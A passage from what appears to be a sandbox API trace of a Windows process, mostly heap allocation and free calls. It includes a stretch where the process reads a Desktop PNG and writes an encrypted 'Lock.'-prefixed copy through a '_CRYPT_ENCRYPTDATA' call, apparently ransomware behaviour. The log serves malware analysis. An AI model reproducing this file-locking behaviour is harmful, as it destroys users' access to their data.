hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0152.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0152.572] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0152.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0152.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0152.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0152.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0152.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0152.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0152.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/GHvT80V7X_pq3d.png" (normalized: "c:\\users\\fd1hvy\\desktop\\ghvt80v7x_pq3d.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0152.575] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.575] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0152.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0152.575] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0152.575] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0152.575] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0152.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0152.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0152.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.576] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0152.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0152.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0152.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0152.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0152.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.GHvT80V7X_pq3d.png" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.ghvt80v7x_pq3d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0152.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0152.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0152.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0152.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0152.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0152.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0152.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.583] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0152.583] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0152.664] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x4189, lpOverlapped=0x0) returned 1 [0152.664] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0152.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.674] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14189) returned 0x2f14010 [0152.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0152.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0152.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0152.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0152.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0152.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0152.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0152.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14189) returned 0x2e80330 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0152.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0152.680] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0152.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 